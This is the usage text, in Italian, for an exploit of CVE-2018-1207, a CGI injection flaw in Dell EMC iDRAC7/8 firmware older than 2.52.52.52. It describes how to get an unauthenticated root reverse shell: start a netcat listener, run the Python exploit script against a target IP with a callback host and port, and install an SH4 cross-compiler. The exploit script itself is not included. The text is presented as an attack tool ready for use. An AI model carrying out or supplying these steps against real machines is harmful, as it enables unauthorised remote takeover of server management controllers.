
Exploit per firmware iDRAC 7 e 8 < 2.52.52.52
Exploit per iDRAC 7 & 8 con firmware < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, versioni precedenti alla 2.52.52.52, contengono una vulnerabilità di iniezione CGI che potrebbe essere utilizzata per eseguire codice remoto. Un attaccante remoto non autenticato potrebbe potenzialmente essere in grado di utilizzare variabili CGI per eseguire codice remoto.
Questo codice dovrebbe far sì che il servizio iDRAC apra una reverse shell come utente root.
Avvia il tuo listener locale: nc -v -l -p local_port
nc -v -l -p 5500
Esegui l'exploit: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
Devi avere installata una versione di sh4-linux-gnu-gcc, che attualmente è sh4-linux-gnu-gcc-11
Puoi installarlo con apt install gcc-11-sh4-linux-gnu